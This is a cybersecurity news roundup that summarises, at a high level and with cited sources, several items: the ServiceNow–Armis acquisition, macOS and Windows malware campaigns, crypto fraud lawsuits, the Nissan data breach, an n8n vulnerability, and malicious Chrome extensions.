In today’s cybersecurity news…
ServiceNow to acquire cybersecurity startup Armis
ServiceNow agreed to acquire cybersecurity company Armis for $7.75 billion, marking the largest acquisition in ServiceNow’s history. Armis specializes in cyber exposure management and cybersecurity for IT systems, operational technology, medical devices, and other connected assets. Armis’ team (roughly 950 employees) will join ServiceNow after the deal closes. (The Wall Street Journal)
MacSync Stealer adopts quieter installation
Jamf Threat Labs identified a reworked MacSync Stealer variant for macOS that disguises itself as a legitimate, Apple-signed and notarized Swift app, using a quieter, largely automated installation process that avoids earlier user-interaction tricks. The malware’s distributed via a disk image posing as a messaging app installer, silently downloads and executes an encoded second-stage payload in memory, then leaves minimal forensic traces. Jamf reported the developer certificate to Apple, which has since revoked it. (Infosecurity Magazine)
SEC sues crypto firms for defrauding investors
The SEC sued seven crypto-related firms, accusing each of running WhatsApp-based “investment clubs” that used deepfake videos, fake professors, and AI-generated trading tips to defraud retail investors out of more than $14 million. Victims were steered to bogus crypto platforms and fake security token offerings, then blocked from withdrawing funds unless they paid additional fees, with money routed to overseas bank accounts and crypto wallets in Southeast Asia. The SEC is seeking civil penalties, as part of a broader U.S. crackdown on large-scale scam operations linked to the region. (The Record)
Nissan customer data stolen in Red Hat raid
Nissan disclosed that around 21,000 customers in Japan had personal data exposed after attackers accessed a Red Hat–managed GitLab server used by a former Nissan dealer. The stolen information includes names, addresses, phone numbers, and partial email addresses, though no payment data appears to have been taken. Red Hat detected the breach in late September and alerted Nissan in early October. The incident is Nissan’s third major data breach in three years. (The Register)
Huge thanks to our sponsor, ThreatLocker
workshops that show CISOs exactly how to implement and maintain Zero Trust in real
environments. Join us March 4–6 in Orlando, plus a live CISO Series episode on March
6. Get $200 off with ZTWCISO26 at ztw.com.
n8n flaw could allow arbitrary code execution
A critical vulnerability in the n8n workflow automation platform could let authenticated attackers execute arbitrary code and fully compromise affected instances. The flaw affects n8n’s expression evaluation system and potentially exposes data, workflows, and underlying systems, with more than 100,000 internet-facing instances potentially vulnerable as of December 22nd. Users are urged to upgrade immediately. (Security Affairs)
WebRAT spread through GitHub exploits
WebRAT malware is being distributed via malicious GitHub repositories posing as proof-of-concept exploits for recently disclosed vulnerabilities, including Windows and WordPress flaws. This is according to Kaspersky researchers who found at least 15 repositories using AI-generated vulnerability descriptions to trick users into running a dropper that disables Windows Defender and installs the backdoor, which can steal credentials, crypto wallet data, and spy via webcams. All identified repositories have since been taken down. (BleepingComputer)
US disrupts bank account takeover operation
The U.S. Justice Department seized the domain web3adspanels.org, which officials say was used as a control panel for a bank account takeover operation that stole millions from Americans via fraudulent search ads impersonating major banks. The FBI identified at least 19 victims with attempted losses of about $28 million and confirmed losses of roughly $14.6 million, and says the database hosted credentials for thousands of victims. Bank account takeover fraud has generated more than $262 million in reported losses this year. (The Record)
Chrome extensions caught stealing credentials
Two malicious Chrome extensions called Phantom Shuttle posed as a network speed test and VPN service while secretly intercepting traffic and stealing credentials from more than 170 websites, according to Socket Security. Researchers found the extensions routed selected traffic through attacker-controlled proxies, exfiltrating plaintext emails and passwords, payment data, developer secrets, and browsing activity while maintaining a persistent connection to a command-and-control server. The operation has run for years and likely originated in China. (The Hacker News)